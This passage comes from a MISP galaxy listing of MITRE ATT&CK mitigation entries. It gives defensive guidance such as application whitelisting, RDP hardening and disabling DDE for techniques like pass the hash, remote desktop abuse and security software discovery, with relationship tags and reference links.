https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

Security Software Discovery Mitigation - T1063

Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about local security software, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Security Software Discovery Mitigation - T1063"

View relationships graph

Security Software Discovery Mitigation - T1063 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1063" with estimative-language:likelihood-probability="almost-certain"

Table 4132. Table References
Links
https://attack.mitre.org/mitigations/T1063
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx
https://technet.microsoft.com/en-us/library/ee791851.aspx

Network Service Scanning Mitigation - T1046

Use network intrusion detection/prevention systems to detect and prevent remote service scans. Ensure that unnecessary ports and services are closed and proper network segmentation is followed to protect critical servers and devices.

Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about services running on remote systems, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Network Service Scanning Mitigation - T1046"

View relationships graph

Network Service Scanning Mitigation - T1046 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046" with estimative-language:likelihood-probability="almost-certain"

Table 4133. Table References
Links
https://attack.mitre.org/mitigations/T1046
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx
https://technet.microsoft.com/en-us/library/ee791851.aspx

Application Isolation and Sandboxing - M1048

Restrict execution of code to a virtual environment on or in transit to an endpoint system.

The tag is: misp-galaxy:mitre-course-of-action="Application Isolation and Sandboxing - M1048"

View relationships graph

Application Isolation and Sandboxing - M1048 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Dynamic Data Exchange - T1173" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Scripting - T1064" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Exploitation for Credential Access - T1212" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Exploitation for Defense Evasion - T1211" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Exploitation of Remote Services - T1210" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Component Object Model and Distributed COM - T1175" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Distributed Component Object Model - T1021.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Inter-Process Communication - T1559" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Dynamic Data Exchange - T1559.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Component Object Model - T1559.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Escape to Host - T1611" with estimative-language:likelihood-probability="almost-certain"

Table 4134. Table References
Links
https://attack.mitre.org/mitigations/M1048

Inhibit System Recovery Mitigation - T1490

Consider technical controls to prevent the disabling of services or deletion of files involved in system recovery.

Consider implementing IT disaster recovery plans that contain procedures for taking regular data backups that can be used to restore organizational data.(Citation: Ready.gov IT DRP) Ensure backups are stored off system and is protected from common methods adversaries may use to gain access and destroy the backups to prevent recovery.

The tag is: misp-galaxy:mitre-course-of-action="Inhibit System Recovery Mitigation - T1490"

View relationships graph

Inhibit System Recovery Mitigation - T1490 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Inhibit System Recovery - T1490" with estimative-language:likelihood-probability="almost-certain"

Table 4135. Table References
Links
https://attack.mitre.org/mitigations/T1490
https://www.ready.gov/business/implementation/IT
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx
https://technet.microsoft.com/en-us/library/ee791851.aspx

Uncommonly Used Port Mitigation - T1065

Properly configure firewalls and proxies to limit outgoing traffic to only necessary ports.

The tag is: misp-galaxy:mitre-course-of-action="Uncommonly Used Port Mitigation - T1065"

View relationships graph

Uncommonly Used Port Mitigation - T1065 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1065" with estimative-language:likelihood-probability="almost-certain"

Table 4136. Table References
Links
https://attack.mitre.org/mitigations/T1065
https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

Pass the Hash Mitigation - T1075

Monitor systems and domain logs for unusual credential logon activity. Prevent access to [Valid Accounts](https://attack.mitre.org/techniques/T1078). Apply patch KB2871997 to Windows 7 and higher systems to limit the default access of accounts in the local administrator group.

Enable pass the hash mitigations to apply UAC restrictions to local accounts on network logon. The associated Registry key is located <code>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy</code> Through GPO: Computer Configuration > [Policies] > Administrative Templates > SCM: Pass the Hash Mitigations: Apply UAC restrictions to local accounts on network logons. (Citation: GitHub IAD Secure Host Baseline UAC Filtering)

Limit credential overlap across systems to prevent the damage of credential compromise and reduce the adversary’s ability to perform Lateral Movement between systems. Ensure that built-in and created local administrator accounts have complex, unique passwords. Do not allow a domain user to be in the local administrator group on multiple systems.

The tag is: misp-galaxy:mitre-course-of-action="Pass the Hash Mitigation - T1075"

View relationships graph

Pass the Hash Mitigation - T1075 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Pass the Hash - T1075" with estimative-language:likelihood-probability="almost-certain"

Table 4137. Table References
Links
https://attack.mitre.org/mitigations/T1075
https://github.com/iadgov/Secure-Host-Baseline/blob/master/Windows/Group%20Policy%20Templates/en-US/SecGuide.adml

Remote Desktop Protocol Mitigation - T1076

Disable the RDP service if it is unnecessary, remove unnecessary accounts and groups from Remote Desktop Users groups, and enable firewall rules to block RDP traffic between network security zones. Audit the Remote Desktop Users group membership regularly. Remove the local Administrators group from the list of groups allowed to log in through RDP. Limit remote user permissions if remote access is necessary. Use remote desktop gateways and multifactor authentication for remote logins. (Citation: Berkley Secure) Do not leave RDP accessible from the internet. Change GPOs to define shorter timeouts sessions and maximum amount of time any single session can be active. Change GPOs to specify the maximum amount of time that a disconnected session stays active on the RD session host server. (Citation: Windows RDP Sessions)

The tag is: misp-galaxy:mitre-course-of-action="Remote Desktop Protocol Mitigation - T1076"

View relationships graph

Remote Desktop Protocol Mitigation - T1076 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1076" with estimative-language:likelihood-probability="almost-certain"

Table 4138. Table References
Links
https://attack.mitre.org/mitigations/T1076
https://security.berkeley.edu/node/94
https://technet.microsoft.com/en-us/library/cc754272(v=ws.11).aspx

NTFS File Attributes Mitigation - T1096

It may be difficult or inadvisable to block access to EA and ADSs. (Citation: Microsoft ADS Mar 2014) (Citation: Symantec ADS May 2009) Efforts should be focused on preventing potentially malicious software from running. Identify and block potentially malicious software that may contain functionality to hide information in EA and ADSs by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

Consider adjusting read and write permissions for NTFS EA, though this should be tested to ensure routine OS operations are not impeded. (Citation: InsiderThreat NTFS EA Oct 2017)

The tag is: misp-galaxy:mitre-course-of-action="NTFS File Attributes Mitigation - T1096"

View relationships graph

NTFS File Attributes Mitigation - T1096 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1096" with estimative-language:likelihood-probability="almost-certain"

Table 4139. Table References
Links
https://attack.mitre.org/mitigations/T1096
https://blogs.technet.microsoft.com/askcore/2013/03/24/alternate-data-streams-in-ntfs/
https://www.symantec.com/connect/articles/what-you-need-know-about-alternate-data-streams-windows-your-data-secure-can-you-restore
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx
https://technet.microsoft.com/en-us/library/ee791851.aspx
https://blog.stealthbits.com/attack-step-3-persistence-ntfs-extended-attributes-file-system-attacks

Permission Groups Discovery Mitigation - T1069

Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about groups and permissions, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Permission Groups Discovery Mitigation - T1069"

View relationships graph

Permission Groups Discovery Mitigation - T1069 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Permission Groups Discovery - T1069" with estimative-language:likelihood-probability="almost-certain"

Table 4140. Table References
Links
https://attack.mitre.org/mitigations/T1069
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx
https://technet.microsoft.com/en-us/library/ee791851.aspx

Windows Admin Shares Mitigation - T1077

Do not reuse local administrator account passwords across systems. Ensure password complexity and uniqueness such that the passwords cannot be cracked or guessed. Deny remote use of local admin credentials to log into systems. Do not allow domain user accounts to be in the local Administrators group multiple systems.

Identify unnecessary system utilities or potentially malicious software that may be used to leverage SMB and the Windows admin shares, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Windows Admin Shares Mitigation - T1077"

View relationships graph

Windows Admin Shares Mitigation - T1077 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Windows Admin Shares - T1077" with estimative-language:likelihood-probability="almost-certain"

Table 4141. Table References
Links
https://attack.mitre.org/mitigations/T1077
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx
https://technet.microsoft.com/en-us/library/ee791851.aspx

Pass the Ticket Mitigation - T1097

Monitor domains for unusual credential logons. Limit credential overlap across systems to prevent the damage of credential compromise. Ensure that local administrator accounts have complex, unique passwords. Do not allow a user to be a local administrator for multiple systems. Limit domain admin account permissions to domain controllers and limited servers. Delegate other admin functions to separate accounts. (Citation: ADSecurity AD Kerberos Attacks)

For containing the impact of a previously generated golden ticket, reset the built-in KRBTGT account password twice, which will invalidate any existing golden tickets that have been created with the KRBTGT hash and other Kerberos tickets derived from it. (Citation: CERT-EU Golden Ticket Protection)

Attempt to identify and block unknown or malicious software that could be used to obtain Kerberos tickets and use them to authenticate by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Pass the Ticket Mitigation - T1097"

View relationships graph

Pass the Ticket Mitigation - T1097 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Pass the Ticket - T1097" with estimative-language:likelihood-probability="almost-certain"

Table 4142. Table References
Links
https://attack.mitre.org/mitigations/T1097
https://adsecurity.org/?p=556
https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx
https://technet.microsoft.com/en-us/library/ee791851.aspx

Disabling Security Tools Mitigation - T1089

Ensure proper process, registry, and file permissions are in place to prevent adversaries from disabling or interfering with security services.

The tag is: misp-galaxy:mitre-course-of-action="Disabling Security Tools Mitigation - T1089"

View relationships graph

Disabling Security Tools Mitigation - T1089 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Disabling Security Tools - T1089" with estimative-language:likelihood-probability="almost-certain"

Table 4143. Table References
Links
https://attack.mitre.org/mitigations/T1089

Space after Filename Mitigation - T1151

Prevent files from having a trailing space after the extension.

The tag is: misp-galaxy:mitre-course-of-action="Space after Filename Mitigation - T1151"

View relationships graph

Space after Filename Mitigation - T1151 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Space after Filename - T1151" with estimative-language:likelihood-probability="almost-certain"

Table 4144. Table References
Links
https://attack.mitre.org/mitigations/T1151

Credentials in Registry Mitigation - T1214

Do not store credentials within the Registry. Proactively search for credentials within Registry keys and attempt to remediate the risk. If necessary software must store credentials, then ensure those accounts have limited permissions so they cannot be abused if obtained by an adversary.

The tag is: misp-galaxy:mitre-course-of-action="Credentials in Registry Mitigation - T1214"

View relationships graph

Credentials in Registry Mitigation - T1214 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Credentials in Registry - T1214" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Credentials in Registry - T1552.002" with estimative-language:likelihood-probability="almost-certain"

Table 4145. Table References
Links
https://attack.mitre.org/mitigations/T1214

System Time Discovery Mitigation - T1124

Benign software uses legitimate processes to gather system time. Efforts should be focused on preventing unwanted or unknown code from executing on a system. Some common tools, such as net.exe, may be blocked by policy to prevent common ways of acquiring remote system time.

Identify unnecessary system utilities or potentially malicious software that may be used to acquire system time information, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="System Time Discovery Mitigation - T1124"

View relationships graph

System Time Discovery Mitigation - T1124 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"

Table 4146. Table References
Links
https://attack.mitre.org/mitigations/T1124
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx
https://technet.microsoft.com/en-us/library/ee791851.aspx

Browser Bookmark Discovery Mitigation - T1217

File system activity is a common part of an operating system, so it is unlikely that mitigation would be appropriate for this technique. For example, mitigating accesses to browser bookmark files will likely have unintended side effects such as preventing legitimate software from operating properly. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identification of subsequent malicious behavior. It may still be beneficial to identify and block unnecessary system utilities or potentially malicious software by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Browser Bookmark Discovery Mitigation - T1217"

View relationships graph

Browser Bookmark Discovery Mitigation - T1217 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Browser Bookmark Discovery - T1217" with estimative-language:likelihood-probability="almost-certain"

Table 4147. Table References
Links
https://attack.mitre.org/mitigations/T1217
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx
https://technet.microsoft.com/en-us/library/ee791851.aspx

Netsh Helper DLL Mitigation - T1128

Identify and block potentially malicious software that may persist in this manner by using whitelisting (Citation: Beechey 2010) tools capable of monitoring DLL loads by Windows utilities like AppLocker. (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker)

The tag is: misp-galaxy:mitre-course-of-action="Netsh Helper DLL Mitigation - T1128"

View relationships graph

Netsh Helper DLL Mitigation - T1128 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Netsh Helper DLL - T1128" with estimative-language:likelihood-probability="almost-certain"

Table 4148. Table References
Links
https://attack.mitre.org/mitigations/T1128
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

Remote Access Tools Mitigation - T1219

Properly configure firewalls, application firewalls, and proxies to limit outgoing traffic to sites and services used by remote access tools.

Network intrusion detection and prevention systems that use network signatures may be able to prevent traffic to these services as well.

Use application whitelisting to mitigate use of and installation of unapproved software.

The tag is: misp-galaxy:mitre-course-of-action="Remote Access Tools Mitigation - T1219"

View relationships graph

Remote Access Tools Mitigation - T1219 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"

Table 4149. Table References
Links
https://attack.mitre.org/mitigations/T1219

External Remote Services Mitigation - T1133

Limit access to remote services through centrally managed concentrators such as VPNs and other managed remote access systems. Deny direct remote access to internal systems through the use of network proxies, gateways, and firewalls. Disable or block remotely available services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1028). Use strong two-factor or multi-factor authentication for remote service accounts to mitigate an adversary’s ability to leverage stolen credentials, but be aware of [Two-Factor Authentication Interception](https://attack.mitre.org/techniques/T1111) techniques for some two-factor authentication implementations.

The tag is: misp-galaxy:mitre-course-of-action="External Remote Services Mitigation - T1133"

View relationships graph

External Remote Services Mitigation - T1133 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="External Remote Services - T1133" with estimative-language:likelihood-probability="almost-certain"

Table 4150. Table References
Links
https://attack.mitre.org/mitigations/T1133

Access Token Manipulation Mitigation - T1134

Access tokens are an integral part of the security system within Windows and cannot be turned off. However, an attacker must already have administrator level access on the local system to make full use of this technique; be sure to restrict users and accounts to the least privileges they require to do their job.

Any user can also spoof access tokens if they have legitimate credentials. Follow mitigation guidelines for preventing adversary use of [Valid Accounts](https://attack.mitre.org/techniques/T1078). Limit permissions so that users and user groups cannot create tokens. This setting should be defined for the local system account only. GPO: Computer Configuration > [Policies] > Windows Settings > Security Settings > Local Policies > User Rights Assignment: Create a token object. (Citation: Microsoft Create Token) Also define who can create a process level token to only the local and network service through GPO: Computer Configuration > [Policies] > Windows Settings > Security Settings > Local Policies > User Rights Assignment: Replace a process level token. (Citation: Microsoft Replace Process Token)

Also limit opportunities for adversaries to increase privileges by limiting Privilege Escalation opportunities.

The tag is: misp-galaxy:mitre-course-of-action="Access Token Manipulation Mitigation - T1134"

View relationships graph

Access Token Manipulation Mitigation - T1134 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Access Token Manipulation - T1134" with estimative-language:likelihood-probability="almost-certain"

Table 4151. Table References
Links
https://attack.mitre.org/mitigations/T1134
https://docs.microsoft.com/windows/device-security/security-policy-settings/create-a-token-object
https://docs.microsoft.com/windows/device-security/security-policy-settings/replace-a-process-level-token

Network Share Discovery Mitigation - T1135

Identify unnecessary system utilities or potentially malicious software that may be used to acquire network share information, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Network Share Discovery Mitigation - T1135"

View relationships graph

Network Share Discovery Mitigation - T1135 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" with estimative-language:likelihood-probability="almost-certain"

Table 4152. Table References
Links
https://attack.mitre.org/mitigations/T1135
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx
https://technet.microsoft.com/en-us/library/ee791851.aspx

Dynamic Data Exchange Mitigation - T1173

Registry keys specific to Microsoft Office feature control security can be set to disable automatic DDE/OLE execution. (Citation: Microsoft DDE Advisory Nov 2017) (Citation: BleepingComputer DDE Disabled in Word Dec 2017) (Citation: GitHub Disable DDEAUTO Oct 2017) Microsoft also created, and enabled by default, Registry keys to completely disable DDE execution in Word and Excel. (Citation: Microsoft ADV170021 Dec 2017)

Ensure Protected View is enabled (Citation: Microsoft Protected View) and consider disabling embedded files in Office programs, such as OneNote, not enrolled in Protected View. (Citation: Enigma Reviving DDE Jan 2018) (Citation: GitHub Disable DDEAUTO Oct 2017)

On Windows 10, enable Attack Surface Reduction (ASR) rules to prevent DDE attacks and spawning of child processes from Office programs. (Citation: Microsoft ASR Nov 2017) (Citation: Enigma Reviving DDE Jan 2018)

The tag is: misp-galaxy:mitre-course-of-action="Dynamic Data Exchange Mitigation - T1173"

View relationships graph

Dynamic Data Exchange Mitigation - T1173 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Dynamic Data Exchange - T1173" with estimative-language:likelihood-probability="almost-certain"

Table 4153. Table References
Links
https://attack.mitre.org/mitigations/T1173
https://technet.microsoft.com/library/security/4053440
https://www.bleepingcomputer.com/news/microsoft/microsoft-disables-dde-feature-in-word-to-prevent-further-malware-attacks/
https://gist.github.com/wdormann/732bb88d9b5dd5a66c9f1e1498f31a1b
https://portal.msrc.microsoft.com/security-guidance/advisory/ADV170021
https://support.office.com/en-us/article/What-is-Protected-View-d6f09ac7-e6b9-4495-8e43-2bbcdbcb6653
https://posts.specterops.io/reviving-dde-using-onenote-and-excel-for-code-execution-d7226864caee
https://docs.microsoft.com/windows/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction

Clear Command History Mitigation - T1146

Preventing users from deleting or writing to certain files can stop adversaries from maliciously altering their <code>~/.bash_history</code> files. Additionally, making these environment variables readonly can make sure that the history is preserved (Citation: Securing bash history).

The tag is: misp-galaxy:mitre-course-of-action="Clear Command History Mitigation - T1146"

View relationships graph

Clear Command History Mitigation - T1146 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Clear Command History - T1146" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Clear Command History - T1070.003" with estimative-language:likelihood-probability="almost-certain"

Table 4154. Table References
Links
https://attack.mitre.org/mitigations/T1146
http://www.akyl.net/securing-bashhistory-file-make-sure-your-linux-system-users-won%E2%80%99t-hide-or-delete-their-bashhistory

Password Filter DLL Mitigation - T1174

Ensure only valid password filters are registered. Filter DLLs must be present in Windows installation directory (<code>C:\Windows\System32\</code> by default) of a domain controller and/or local computer with a corresponding entry in <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages</code>. (Citation: Microsoft Install Password Filter n.d)

The tag is: misp-galaxy:mitre-course-of-action="Password Filter DLL Mitigation - T1174"

View relationships graph

Password Filter DLL Mitigation - T1174 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Password Filter DLL - T1174" with estimative-language:likelihood-probability="almost-certain"

Table 4155. Table References
Links
https://attack.mitre.org/mitigations/T1174
https://msdn.microsoft.com/library/windows/desktop/ms721766.aspx

Spearphishing via Service Mitigation - T1194

Determine if certain social media sites, personal webmail services, or other service that can be used for spearphishing is necessary for business operations and consider blocking access if activity cannot be monitored well or if it poses a significant risk.

Because this technique involves use of legitimate services and user interaction on the endpoint, it’s difficult to fully mitigate. However, there are potential mitigations. Users can be trained to identify social engineering techniques and spearphishing emails with malicious links. To prevent the downloads from executing, application whitelisting can be used. Anti-virus can also automatically quarantine suspicious files.

The tag is: misp-galaxy:mitre-course-of-action="Spearphishing via Service Mitigation - T1194"

View relationships graph

Spearphishing via Service Mitigation - T1194 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Spearphishing via Service - T1194" with estimative-language:likelihood-probability="almost-certain"

Table 4156. Table References
Links
https://attack.mitre.org/mitigations/T1194

Supply Chain Compromise Mitigation - T1195

Apply supply chain risk management (SCRM) practices and procedures (Citation: MITRE SE Guide 2014), such as supply chain analysis and appropriate risk management, throughout the life-cycle of a system.

Leverage established software development lifecycle (SDLC) practices (Citation: NIST Supply Chain 2012):

Uniquely Identify Supply Chain Elements, Processes, and Actors
Limit Access and Exposure within the Supply Chain
Establish and Maintain the Provenance of Elements, Processes, Tools, and Data
Share Information within Strict Limits
Perform SCRM Awareness and Training
Use Defensive Design for Systems, Elements, and Processes
Perform Continuous Integrator Review
Strengthen Delivery Mechanisms
Assure Sustainment Activities and Processes
Manage Disposal and Final Disposition Activities throughout the System or Element Life Cycle

A patch management process should be implemented to check unused dependencies, unmaintained and/or previously vulnerable dependencies, unnecessary features, components, files, and documentation. Continuous monitoring of vulnerability sources and the use of automatic and manual code review tools should also be implemented as well. (Citation: OWASP Top 10 2017)

The tag is: misp-galaxy:mitre-course-of-action="Supply Chain Compromise Mitigation - T1195"

View relationships graph

Supply Chain Compromise Mitigation - T1195 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Supply Chain Compromise - T1195" with estimative-language:likelihood-probability="almost-certain"

Table 4157. Table References
Links
https://attack.mitre.org/mitigations/T1195
https://www.mitre.org/sites/default/files/publications/se-guide-book-interactive.pdf
http://dx.doi.org/10.6028/NIST.IR.7622
https://owasp.org/www-project-top-ten/OWASP_Top_Ten_2017/

Setuid and Setgid Mitigation - T1166

Applications with known vulnerabilities or known shell escapes should not have the setuid or setgid bits set to reduce potential damage if an application is compromised. Additionally, the number of programs with setuid or setgid bits set should be minimized across a system.

The tag is: misp-galaxy:mitre-course-of-action="Setuid and Setgid Mitigation - T1166"

View relationships graph

Setuid and Setgid Mitigation - T1166 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Setuid and Setgid - T1166" with estimative-language:likelihood-probability="almost-certain"

Table 4158. Table References
Links
https://attack.mitre.org/mitigations/T1166

Local Job Scheduling Mitigation - T1168

Limit privileges of user accounts and remediate Privilege Escalation vectors so only authorized users can create scheduled jobs. Identify and block unnecessary system utilities or potentially malicious software that may be used to schedule jobs using whitelisting tools.

The tag is: misp-galaxy:mitre-course-of-action="Local Job Scheduling Mitigation - T1168"

View relationships graph

Local Job Scheduling Mitigation - T1168 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Local Job Scheduling - T1168" with estimative-language:likelihood-probability="almost-certain"

Table 4159. Table References
Links
https://attack.mitre.org/mitigations/T1168

Control Panel Items Mitigation - T1196

This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of operating system design features. For example, mitigating specific Windows API calls and/or execution of particular file extensions will likely have unintended side effects, such as preventing legitimate software (i.e., drivers and configuration tools) from operating properly. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identification of subsequent malicious behavior.

Restrict storage and execution of Control Panel items to protected directories, such as <code>C:\Windows</code>, rather than user directories.

Index known safe Control Panel items and block potentially malicious software using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown executable files.

